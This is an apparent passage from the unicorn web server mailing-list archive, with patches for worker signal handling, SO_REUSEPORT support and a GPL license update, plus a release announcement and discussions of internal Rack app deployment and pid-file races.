+    readers
   end
 
   def reopen_worker_logs(worker_nr)
     logger.info "worker=#{worker_nr} reopening logs..."
     Unicorn::Util.reopen_logs
     logger.info "worker=#{worker_nr} done reopening logs"
-    init_self_pipe!
     rescue => e
       logger.error(e) rescue nil
       exit!(77) # EX_NOPERM in sysexits.h
@@ -635,22 +636,24 @@ class Unicorn::HttpServer
   # given a INT, QUIT, or TERM signal)
   def worker_loop(worker)
     ppid = master_pid
-    init_worker_process(worker)
+    readers = init_worker_process(worker)
     nr = 0 # this becomes negative if we need to reopen logs
-    l = LISTENERS.dup
-    ready = l.dup
 
-    # closing anything we IO.select on will raise EBADF
-    trap(:USR1) { nr = -65536; SELF_PIPE[0].close rescue nil }
-    trap(:QUIT) { worker = nil; LISTENERS.each { |s| s.close rescue nil }.clear }
-    logger.info "worker=#{worker.nr} ready"
+    # this only works immediately if the master sent us the signal
+    # (which is the normal case)
+    trap(:USR1) { nr = -65536 }
+
+    ready = readers.dup
+    @logger.info "worker=#{worker.nr} ready"
 
     begin
       nr < 0 and reopen_worker_logs(worker.nr)
       nr = 0
-
       worker.tick = Time.now.to_i
-      while sock = ready.shift
+      tmp = ready.dup
+      while sock = tmp.shift
+        # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
+        # but that will return false
         if client = sock.kgio_tryaccept
           process_client(client)
           nr += 1
@@ -663,8 +666,8 @@ class Unicorn::HttpServer
       # we're probably reasonably busy, so avoid calling select()
       # and do a speculative non-blocking accept() on ready listeners
       # before we sleep again in select().
-      unless nr == 0 # (nr < 0) => reopen logs (unlikely)
-        ready = l.dup
+      unless nr == 0
+        tmp = ready.dup
         redo
       end
 
@@ -672,11 +675,11 @@ class Unicorn::HttpServer
 
       # timeout used so we can detect parent death:
       worker.tick = Time.now.to_i
-      ret = IO.select(l, nil, SELF_PIPE, @timeout) and ready = ret[0]
+      ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
     rescue => e
-      redo if nr < 0 && (Errno::EBADF === e || IOError === e) # reopen logs
-      Unicorn.log_error(@logger, "listen loop error", e) if worker
-    end while worker
+      redo if nr < 0
+      Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
+    end while readers[0]
   end
 
   # delivers a signal to a worker and fails gracefully if the worker
@@ -692,6 +695,10 @@ class Unicorn::HttpServer
     WORKERS.keys.each { |wpid| kill_worker(signal, wpid) }
   end
 
+  def soft_kill_each_worker(signal)
+    WORKERS.each_value { |worker| worker.soft_kill(signal) }
+  end
+
   # unlinks a PID file at given +path+ if it contains the current PID
   # still potentially racy without locking the directory (which is
   # non-portable and may interact badly with other programs), but the
@@ -720,7 +727,7 @@ class Unicorn::HttpServer
     config[:listeners].replace(@init_listeners)
     config.reload
     config.commit!(self)
-    kill_each_worker(:QUIT)
+    soft_kill_each_worker(:QUIT)
     Unicorn::Util.reopen_logs
     self.app = orig_app
     build_app! if preload_app
@@ -756,12 +763,6 @@ class Unicorn::HttpServer
     io.sync = true
   end
 
-  def init_self_pipe!
-    SELF_PIPE.each { |io| io.close rescue nil }
-    SELF_PIPE.replace(Kgio::Pipe.new)
-    SELF_PIPE.each { |io| io.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
-  end
-
   def inherit_listeners!
     # inherit sockets from parents, they need to be plain Socket objects
     # before they become Kgio::UNIXServer or Kgio::TCPServer
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 1fb6a4a..e74a1c9 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -12,6 +12,7 @@ class Unicorn::Worker
   # :stopdoc:
   attr_accessor :nr, :switched
   attr_writer :tmp
+  attr_reader :to_io # IO.select-compatible
 
   PER_DROP = Raindrops::PAGE_SIZE / Raindrops::SIZE
   DROPS = []
@@ -23,6 +24,66 @@ class Unicorn::Worker
     @raindrop[@offset] = 0
     @nr = nr
     @tmp = @switched = false
+    @to_io, @master = Unicorn.pipe
+  end
+
+  def atfork_child # :nodoc:
+    # we _must_ close in child, parent just holds this open to signal
+    @master = @master.close
+  end
+
+  # master fakes SIGQUIT using this
+  def quit # :nodoc:
+    @master = @master.close if @master
+  end
+
+  # parent does not read
+  def atfork_parent # :nodoc:
+    @to_io = @to_io.close
+  end
+
+  # call a signal handler immediately without triggering EINTR
+  # We do not use the more obvious Process.kill(sig, $$) here since
+  # that signal delivery may be deferred.  We want to avoid signal delivery
+  # while the Rack app.call is running because some database drivers
+  # (e.g. ruby-pg) may cancel pending requests.
+  def fake_sig(sig) # :nodoc:
+    old_cb = trap(sig, "IGNORE")
+    old_cb.call
+  ensure
+    trap(sig, old_cb)
+  end
+
+  # master sends fake signals to children
+  def soft_kill(sig) # :nodoc:
+    case sig
+    when Integer
+      signum = sig
+    else
+      signum = Signal.list[sig.to_s] or
+          raise ArgumentError, "BUG: bad signal: #{sig.inspect}"
+    end
+    # writing and reading 4 bytes on a pipe is atomic on all POSIX platforms
+    # Do not care in the odd case the buffer is full, here.
+    @master.kgio_trywrite([signum].pack('l'))
+  rescue Errno::EPIPE
+    # worker will be reaped soon
+  end
+
+  # this only runs when the Rack app.call is not running
+  # act like a listener
+  def kgio_tryaccept # :nodoc:
+    case buf = @to_io.kgio_tryread(4)
+    when String
+      # unpack the buffer and trigger the signal handler
+      signum = buf.unpack('l')
+      fake_sig(signum[0])
+      # keep looping, more signals may be queued
+    when nil # EOF: master died, but we are at a safe place to exit
+      fake_sig(:QUIT)
+    when :wait_readable # keep waiting
+      return false
+    end while true # loop, as multiple signals may be sent
   end
 
   # worker objects may be compared to just plain Integers
@@ -49,8 +110,11 @@ class Unicorn::Worker
     end
   end
 
+  # called in both the master (reaping worker) and worker (SIGQUIT handler)
   def close # :nodoc:
     @tmp.close if @tmp
+    @master.close if @master
+    @to_io.close if @to_io
   end
 
   # :startdoc:
-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 2%]

* Re: Best way to deploy an internal Rack app?
  2013-11-21 10:58  3% Best way to deploy an internal Rack app? Andrew Stewart
@ 2013-11-21 17:22  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-11-21 17:22 UTC (permalink / raw)
  To: unicorn list

Andrew Stewart <boss@airbladesoftware.com> wrote:
> Hello!
> 
> I have a Rails monolith and have identified a few parts which can be
> chipped off and deployed as self-contained services, called by the
> monolith.
> 
> Each service will be a rack app presenting an API over HTTP.  For now
> everything will run on the same box.  The services shouldn't be
> exposed to the outside world.

> I have almost built the first service and am now wondering how best to serve it.  For example:
> 
> - Does Unicorn alone suffice or should I front it with Nginx?

This depends on how you want clients to connect.  Either the unicorns
need to listen on different addresses/ports, or you can set up nginx to
handle routing so clients only connect to nginx.

> - To keep the services internal do I just listen to a port on the
> loopback interface?

Any address:port (127.0.0.1:1234, 127.0.0.2:1234, ...), or unix socket.
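
For example, a per-service config could look something like this
(a sketch; the ports and paths are made up):

    # service_a/unicorn.conf.rb
    worker_processes 2

    # loopback TCP keeps the service off the public interface...
    listen "127.0.0.1:1234"

    # ...or use a unix socket and let nginx proxy to it
    listen "/var/run/service_a/unicorn.sock", :backlog => 64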
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Best way to deploy an internal Rack app?
@ 2013-11-21 10:58  3% Andrew Stewart
  2013-11-21 17:22  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Andrew Stewart @ 2013-11-21 10:58 UTC (permalink / raw)
  To: unicorn list

Hello!

I have a Rails monolith and have identified a few parts which can be chipped off and deployed as self-contained services, called by the monolith.

Each service will be a rack app presenting an API over HTTP.  For now everything will run on the same box.  The services shouldn't be exposed to the outside world.

I have almost built the first service and am now wondering how best to serve it.  For example:

- Does Unicorn alone suffice or should I front it with Nginx?
- To keep the services internal do I just listen to a port on the loopback interface?

Thanks in advance,

Andrew Stewart

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* [ANN] unicorn 4.7.0 - minor updates, license tweak
@ 2013-11-04  7:57  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-11-04  7:57 UTC (permalink / raw)
  To: mongrel-unicorn

* git://bogomips.org/unicorn.git
* http://unicorn.bogomips.org/NEWS.atom.xml

Changes:

* support SO_REUSEPORT on new listeners (:reuseport)

This allows users to start an independent instance of unicorn on
the same port as a running unicorn (as long as both instances
use :reuseport).

ref: https://lwn.net/Articles/542629/
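
In the config this is just a listener option, e.g. (sketch):

    # both the already-running and the newly-started instance need it:
    listen "0.0.0.0:8080", :reuseport => true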

* unicorn is now GPLv2-or-later and Ruby 1.8-licensed
(instead of GPLv2-only, GPLv3-only, and Ruby 1.8-licensed)

This changes nothing at the moment.  Once the FSF publishes the next
version of the GPL, users may choose the newer GPL version without the
unicorn BDFL approving it.  Two years ago when I got permission to add
GPLv3 to the license options, I also got permission from all past
contributors to approve future versions of the GPL.  So now I'm
approving all future versions of the GPL for use with unicorn.

Reasoning below:

In case the GPLv4 arrives and I am not alive to approve/review it,
the lesser of evils is to give blanket approval of all future GPL
versions (as published by the FSF).  The worse evil is to be stuck
with a license which cannot guarantee the Free-ness of this project
in the future.

This unfortunately means the FSF can theoretically come out with
license terms I do not agree with, but the GPLv2 and GPLv3 will
always be an option to all users.

Note: we currently prefer GPLv3

Two improvements thanks to Ernest W. Durbin III:

* USR2 redirects fixed for Ruby 1.8.6 (broken since 4.1.0)
* unicorn(1) and unicorn_rails(1) enforces valid integer for -p/--port

A few more odd, minor tweaks and fixes:

* attempt to rename PID file when possible (on USR2)
* workaround reopen atomicity issues for stdio vs non-stdio
* improve handling of client-triggerable socket errors

-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 2%]

* [PATCH] license: allow all future versions of the GNU GPL
@ 2013-10-26  7:58 10% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-10-26  7:58 UTC (permalink / raw)
  To: mongrel-unicorn

There is currently no GPLv4, so this change has no effect at the
moment.

In case the GPLv4 arrives and I am not alive to approve/review it,
the lesser of evils is to give blanket approval of all future GPL
versions (as published by the FSF).  The worse evil is to be stuck
with a license which cannot guarantee the Free-ness of this project
in the future.

This unfortunately means the FSF can theoretically come out with
license terms I do not agree with, but the GPLv2 and GPLv3 will
always be an option to all users.
---
 LICENSE                          | 17 ++++++++++-------
 README                           |  5 +++--
 ext/unicorn_http/unicorn_http.rl |  2 +-
 lib/unicorn/app/inetd.rb         |  2 +-
 lib/unicorn/app/old_rails.rb     |  2 +-
 lib/unicorn/cgi_wrapper.rb       |  2 +-
 test/test_helper.rb              |  2 +-
 test/unit/test_http_parser.rb    |  2 +-
 test/unit/test_request.rb        |  2 +-
 test/unit/test_response.rb       |  2 +-
 test/unit/test_server.rb         |  2 +-
 test/unit/test_signals.rb        |  2 +-
 unicorn.gemspec                  |  2 +-
 13 files changed, 24 insertions(+), 20 deletions(-)

diff --git a/LICENSE b/LICENSE
index 099110a..5b6458e 100644
--- a/LICENSE
+++ b/LICENSE
@@ -3,15 +3,18 @@ revision control for names and email addresses of all of them.
 
 You can redistribute it and/or modify it under either the terms of the
 GNU General Public License (GPL) as published by the Free Software
-Foundation (FSF), version {3.0}[http://www.gnu.org/licenses/gpl-3.0.txt]
-or version {2.0}[http://www.gnu.org/licenses/gpl-2.0.txt]
-or the Ruby-specific license terms (see below).
+Foundation (FSF), either version 2 of the License, or (at your option)
+any later version.  We currently prefer the GPLv3 or later for
+derivative works, but the GPLv2 is fine.
 
-The unicorn project leader (Eric Wong) reserves the right to add future
-versions of the GPL (and no other licenses) as published by the FSF to
-the licensing terms.
+The complete texts of the GPLv2 and GPLv3 are below:
+GPLv2 - http://www.gnu.org/licenses/gpl-2.0.txt
+GPLv3 - http://www.gnu.org/licenses/gpl-3.0.txt
 
-=== Ruby-specific terms (if you're not using the GPLv2 or GPLv3)
+You may (against our _preference_) also use the Ruby 1.8 license terms
+which we inherited from the original Mongrel project when we forked it:
+
+=== Ruby 1.8-specific terms (if you're not using the GPL)
 
   1. You may make and give away verbatim copies of the source form of the
      software without restriction, provided that you duplicate all of the
diff --git a/README b/README
index 5dde0d7..42167c8 100644
--- a/README
+++ b/README
@@ -63,8 +63,9 @@ both the the request and response in between \Unicorn and slow clients.
 It is based on Mongrel 1.1.5.
 Mongrel is copyright 2007 Zed A. Shaw and contributors.
 
-\Unicorn is tri-licensed under (your choice) of the GPLv3, GPLv2 or
-Ruby (1.8)-specific terms.  See the included LICENSE file for details.
+\Unicorn is licensed under (your choice) of the GPLv2 or later
+(GPLv3+ preferred), or Ruby (1.8)-specific terms.
+See the included LICENSE file for details.
 
 \Unicorn is 100% Free Software.
 
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index 3529740..6293033 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -2,7 +2,7 @@
  * Copyright (c) 2009 Eric Wong (all bugs are Eric's fault)
  * Copyright (c) 2005 Zed A. Shaw
  * You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
- * the GPLv3
+ * the GPLv2+ (GPLv3+ preferred)
  */
 #include "ruby.h"
 #include "ext_help.h"
diff --git a/lib/unicorn/app/inetd.rb b/lib/unicorn/app/inetd.rb
index b851214..13b6624 100644
--- a/lib/unicorn/app/inetd.rb
+++ b/lib/unicorn/app/inetd.rb
@@ -2,7 +2,7 @@
 # :enddoc:
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 
 # this class *must* be used with Rack::Chunked
 module Unicorn::App
diff --git a/lib/unicorn/app/old_rails.rb b/lib/unicorn/app/old_rails.rb
index ad1ca8e..1e8c41a 100644
--- a/lib/unicorn/app/old_rails.rb
+++ b/lib/unicorn/app/old_rails.rb
@@ -5,7 +5,7 @@
 # Copyright (c) 2005 Zed A. Shaw
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 # Additional work donated by contributors.  See CONTRIBUTORS for more info.
 require 'unicorn/cgi_wrapper'
 require 'dispatcher'
diff --git a/lib/unicorn/cgi_wrapper.rb b/lib/unicorn/cgi_wrapper.rb
index d0175d0..d9b7fe5 100644
--- a/lib/unicorn/cgi_wrapper.rb
+++ b/lib/unicorn/cgi_wrapper.rb
@@ -5,7 +5,7 @@
 # Copyright (c) 2005 Zed A. Shaw
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 #
 # Additional work donated by contributors.  See CONTRIBUTORS for more info.
 
diff --git a/test/test_helper.rb b/test/test_helper.rb
index cf98996..c65f2f3 100644
--- a/test/test_helper.rb
+++ b/test/test_helper.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2005 Zed A. Shaw 
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 #
 # Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html 
 # for more information.
diff --git a/test/unit/test_http_parser.rb b/test/unit/test_http_parser.rb
index 64146e7..8d5b251 100644
--- a/test/unit/test_http_parser.rb
+++ b/test/unit/test_http_parser.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2005 Zed A. Shaw 
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 #
 # Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html
 # for more information.
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index a57cbcd..fbda1a2 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 
 require 'test/test_helper'
 
diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
index 054c3dd..85ac085 100644
--- a/test/unit/test_response.rb
+++ b/test/unit/test_response.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2005 Zed A. Shaw 
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 #
 # Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html 
 # for more information.
diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index a821790..e5b335f 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2005 Zed A. Shaw 
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 #
 # Additional work donated by contributors.  See http://mongrel.rubyforge.org/attributions.html
 # for more information.
diff --git a/test/unit/test_signals.rb b/test/unit/test_signals.rb
index f1d8bb3..443c736 100644
--- a/test/unit/test_signals.rb
+++ b/test/unit/test_signals.rb
@@ -2,7 +2,7 @@
 
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv3
+# the GPLv2+ (GPLv3+ preferred)
 #
 # Ensure we stay sane in the face of signals being sent to us
 
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 0453eb0..4619a89 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -40,5 +40,5 @@ Gem::Specification.new do |s|
   s.add_development_dependency('isolate', '~> 3.2')
   s.add_development_dependency('wrongdoc', '~> 1.6.1')
 
-  s.licenses = ["GPLv2", "GPLv3", "Ruby 1.8"]
+  s.licenses = ["GPLv2+", "Ruby 1.8"]
 end
-- 
1.8.4.483.g7fe67e6.dirty

^ permalink raw reply related	[relevance 10%]

* Re: [PATCH] support SO_REUSEPORT on new listeners (:reuseport)
  2013-10-25 20:34  7% [PATCH] support SO_REUSEPORT on new listeners (:reuseport) Eric Wong
@ 2013-10-25 20:49  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-10-25 20:49 UTC (permalink / raw)
  To: mongrel-unicorn

Eric Wong <normalperson@yhbt.net> wrote:
> This allows users to start an independent instance of unicorn on
> a the same port as a running unicorn (as long as both instances
> use :reuseport).
> 
> ref: https://lwn.net/Articles/542629/
> ---

Also pushed out a couple of trivial IO_PURGATORY-related fixes to
support this.  We'll drop 1.8 support one of these days.

commit e025cd99beee500f175a3bcc302a1307b39ffb77
Author: Eric Wong <e@80x24.org>
Date:   Fri Oct 25 19:45:15 2013 +0000

    avoid IO_PURGATORY on Ruby 1.9+
    
    Ruby 1.9 and later includes IO#autoclose=, so we can use it
    and prevent some dead IO objects from hanging around.

commit 7c125886b5862bf20711bae22e6697ad46141434
Author: Eric Wong <e@80x24.org>
Date:   Fri Oct 25 19:27:05 2013 +0000

    support SO_REUSEPORT on new listeners (:reuseport)
    
    This allows users to start an independent instance of unicorn on
    the same port as a running unicorn (as long as both instances
    use :reuseport).
    
    ref: https://lwn.net/Articles/542629/

commit 1dc099228ee0f59c13385a3e7346a2cb37d85153
Author: Eric Wong <e@80x24.org>
Date:   Fri Oct 25 19:54:39 2013 +0000

    tests: limit oobgc check to accepted sockets
    
    Otherwise these tests fail if we start using IO#autoclose=true
    on Ruby 1.9 (and also if we use IPv6 sockets for tests).

^ permalink raw reply	[relevance 2%]

* [PATCH] support SO_REUSEPORT on new listeners (:reuseport)
@ 2013-10-25 20:34  7% Eric Wong
  2013-10-25 20:49  2% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-10-25 20:34 UTC (permalink / raw)
  To: mongrel-unicorn

This allows users to start an independent instance of unicorn on
the same port as a running unicorn (as long as both instances
use :reuseport).

ref: https://lwn.net/Articles/542629/
---
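(usage sketch, not part of the patch itself: with this applied, a
unicorn config file would enable the option per listener, e.g.

  listen "0.0.0.0:8080", :reuseport => true

the address and port above are placeholders; per the documentation
hunk below, the option only takes effect when the listen socket is
first bound, not on sockets inherited across SIGUSR2)
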
 lib/unicorn/configurator.rb     | 19 +++++++++++++++++++
 lib/unicorn/socket_helper.rb    | 30 ++++++++++++++++++++++--------
 test/unit/test_socket_helper.rb |  8 ++++++++
 3 files changed, 49 insertions(+), 8 deletions(-)

diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index 0d0eac7..fc3405a 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -319,6 +319,25 @@ class Unicorn::Configurator
   #
   #   Default: Operating-system dependent
   #
+  # [:reuseport => true or false]
+  #
+  #   This enables multiple, independently-started unicorn instances to
+  #   bind to the same port (as long as all the processes enable this).
+  #
+  #   This option must be used when unicorn first binds the listen socket.
+  #   It cannot be enabled when a socket is inherited via SIGUSR2
+  #   (but it will remain on if inherited), and it cannot be enabled
+  #   directly via SIGHUP.
+  #
+  #   Note: there is a chance of connections being dropped if
+  #   one of the unicorn instances is stopped while using this.
+  #
+  #   This is supported on *BSD systems and Linux 3.9 or later.
+  #
+  #   ref: https://lwn.net/Articles/542629/
+  #
+  #   Default: false (unset)
+  #
   # [:tries => Integer]
   #
   #   Times to retry binding a socket if it is already in use
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 18b0be7..2701d58 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -41,6 +41,15 @@ module Unicorn
 
       # do not send out partial frames (Linux)
       TCP_CORK = 3 unless defined?(TCP_CORK)
+
+      # Linux got SO_REUSEPORT in 3.9, BSDs have had it for ages
+      unless defined?(SO_REUSEPORT)
+        if RUBY_PLATFORM =~ /(?:alpha|mips|parisc|sparc)/
+          SO_REUSEPORT = 0x0200 # untested
+        else
+          SO_REUSEPORT = 15 # only tested on x86_64 and i686
+        end
+      end
     when /freebsd/
       # do not send out partial frames (FreeBSD)
       TCP_NOPUSH = 4 unless defined?(TCP_NOPUSH)
@@ -142,9 +151,9 @@ module Unicorn
           File.umask(old_umask)
         end
       elsif /\A\[([a-fA-F0-9:]+)\]:(\d+)\z/ =~ address
-        new_ipv6_server($1, $2.to_i, opt)
+        new_tcp_server($1, $2.to_i, opt.merge(:ipv6=>true))
       elsif /\A(\d+\.\d+\.\d+\.\d+):(\d+)\z/ =~ address
-        Kgio::TCPServer.new($1, $2.to_i)
+        new_tcp_server($1, $2.to_i, opt)
       else
         raise ArgumentError, "Don't know how to bind: #{address}"
       end
@@ -152,13 +161,18 @@ module Unicorn
       sock
     end
 
-    def new_ipv6_server(addr, port, opt)
-      opt.key?(:ipv6only) or return Kgio::TCPServer.new(addr, port)
-      defined?(IPV6_V6ONLY) or
-        abort "Socket::IPV6_V6ONLY not defined, upgrade Ruby and/or your OS"
-      sock = Socket.new(AF_INET6, SOCK_STREAM, 0)
-      sock.setsockopt(IPPROTO_IPV6, IPV6_V6ONLY, opt[:ipv6only] ? 1 : 0)
+    def new_tcp_server(addr, port, opt)
+      # n.b. we set FD_CLOEXEC in the workers
+      sock = Socket.new(opt[:ipv6] ? AF_INET6 : AF_INET, SOCK_STREAM, 0)
+      if opt.key?(:ipv6only)
+        defined?(IPV6_V6ONLY) or
+          abort "Socket::IPV6_V6ONLY not defined, upgrade Ruby and/or your OS"
+        sock.setsockopt(IPPROTO_IPV6, IPV6_V6ONLY, opt[:ipv6only] ? 1 : 0)
+      end
       sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
+      if defined?(SO_REUSEPORT) && opt[:reuseport]
+        sock.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1)
+      end
       sock.bind(Socket.pack_sockaddr_in(port, addr))
       IO_PURGATORY << sock
       Kgio::TCPServer.for_fd(sock.fileno)
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index a38082c..abc177b 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -184,4 +184,12 @@ class TestSocketHelper < Test::Unit::TestCase
     assert_equal 1, cur
     rescue Errno::EAFNOSUPPORT
   end if RUBY_VERSION >= "1.9.2"
+
+  def test_reuseport
+    port = unused_port @test_addr
+    name = "#@test_addr:#{port}"
+    sock = bind_listen(name, :reuseport => true)
+    cur = sock.getsockopt(Socket::SOL_SOCKET, SO_REUSEPORT).unpack('i')[0]
+    assert_equal 1, cur
+  end if defined?(SO_REUSEPORT)
 end
-- 
Eric Wong

^ permalink raw reply related	[relevance 7%]

* Re: pid file handling issue
  2013-10-24 18:21  3%         ` Eric Wong
@ 2013-10-24 19:57  0%           ` Michael Fischer
  0 siblings, 0 replies; 200+ results
From: Michael Fischer @ 2013-10-24 19:57 UTC (permalink / raw)
  To: unicorn list

On Thu, Oct 24, 2013 at 11:21 AM, Eric Wong <normalperson@yhbt.net> wrote:

> Right, we looked at using rename last year but I didn't think it's possible
> given we need to write the pid file before binding new listen sockets
>
>   http://mid.gmane.org/20121127215146.GA23452@dcvr.yhbt.net
>
> But perhaps we can drop the pid file late iff ENV["UNICORN_FD"] is
> detected.  I'll see if that can be done w/o breaking compatibility.

My opinion is that supporting backward compatibility cases that are
clearly poorly designed, at least in open-source software, is
ill-advised.  (I'm referring to the Mongrel compatibility semantics
discussed in that article.)

That aside, I don't yet understand this "need" you're referring to.
The control flow I'm proposing is as follows:

(1) Previous-generation parent (P) receives SIGUSR2.
(2) P renames unicorn.pid to unicorn.oldpid
(3) P forks child (P'); if fork unsuccessful, P renames unicorn.oldpid
to unicorn.pid.
(4) P' calls exec and attempts to start; creates unicorn.pid. P
watches for SIGCHLD from P'.  If received, P renames unicorn.oldpid to
unicorn.pid.
(5) P' sends SIGQUIT to P.  P' unlinks unicorn.oldpid.  P' is now P.

What am I missing here?  This is, to my knowledge, precisely what
nginx does (http://wiki.nginx.org/CommandLine#Upgrading_To_a_New_Binary_On_The_Fly).
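
(Sketched in Ruby, purely to illustrate the proposal above -- this is
not existing unicorn behavior, and upgrade_argv is a placeholder for
the re-exec command line:

  File.rename("unicorn.pid", "unicorn.oldpid")   # step 2, atomic per POSIX
  begin
    pid = fork { exec(*upgrade_argv) }           # steps 3-4: spawn P', which re-execs
  rescue SystemCallError
    File.rename("unicorn.oldpid", "unicorn.pid") # fork failed: roll back
  end

with the new master writing unicorn.pid and the old one unlinking
unicorn.oldpid covered by steps 4 and 5.)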

>> If the file's mtime or inode number changes under my proposal, that
>> means the reload must have been successful.   What race condition are
>> you referring to that would render this conclusion inaccurate?
>
> It doesn't mean the process didn't exit/crash right after writing the PID.

That should not happen per (4) above.

> But NTP syncs early in the boot process before most processes (including
> unicorn) are started.  It shouldn't matter, then, right?

Truth be told, I'm not completely certain why this is an issue.  My
reading of procps and the kernel suggests it should be doing the right
thing, but I tried this at first:

- Touch a timestamp file before sending P a SIGUSR2.
- Wait for oldpid to disappear
- Read the stime field from ps(1) for the remaining master process (P or P')
- If stime < mtime of timestamp: new process failed.  If stime >
mtime, new process succeeded.

But for reasons unclear to me, sometimes the stime of P' (successful
reload) would predate the timestamp!  This was obviously agonizing.

>> To reiterate, I'm not using the PID file in this instance to determine
>> Unicorn's PID.  It could be empty, for all I care.
>
> OK.  I assume you do the same for nginx?

With nginx we have -t; we can at least test the config file and have a
reasonable degree of certainty that it will reload properly.  With
Rack apps, not so much. :)

--Michael

^ permalink raw reply	[relevance 0%]

* Re: pid file handling issue
  2013-10-24 17:51  0%       ` Michael Fischer
@ 2013-10-24 18:21  3%         ` Eric Wong
  2013-10-24 19:57  0%           ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-10-24 18:21 UTC (permalink / raw)
  To: unicorn list

Michael Fischer <mfischer@zendesk.com> wrote:
> On Wed, Oct 23, 2013 at 7:03 PM, Eric Wong <normalperson@yhbt.net> wrote:
> 
> >> > I read and stash the value of the pid file before issuing any USR2.
> >> > Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
> >> > to ensure it's dead.
> >>
> >> That's inherently racy; another process can claim the old PID in the interim.
> >
> > Right, but raciness goes for anything regarding pid files.
> >
> > The OS does make an effort to avoid recycling PIDs too often,
> > and going through all the PIDs in a system quickly is
> > probably rare.  I haven't hit it, at least.
> 
> That's not good enough.
> 
> The fact that the pid file contains a pid is immaterial to me; I don't
> even need to look at it.  I only care about when it was created, or
> what its inode number is, so that I can detect whether Unicorn was
> last successfully started or restarted.  rename(2) is atomic per POSIX
> and is not subject to race conditions.

Right, we looked at using rename last year but I didn't think it's possible
given we need to write the pid file before binding new listen sockets

  http://mid.gmane.org/20121127215146.GA23452@dcvr.yhbt.net

But perhaps we can drop the pid file late iff ENV["UNICORN_FD"] is
detected.  I'll see if that can be done w/o breaking compatibility.

> >> > Checking the mtime of the pidfile is really bizarre...
> >>
> >> Perhaps (though it's a normative criticism), but on the other hand, it
> >> isn't subject to the race above.
> >
> > It's still racy in a different way, though (file could change right
> > after checking).
> 
> If the file's mtime or inode number changes under my proposal, that
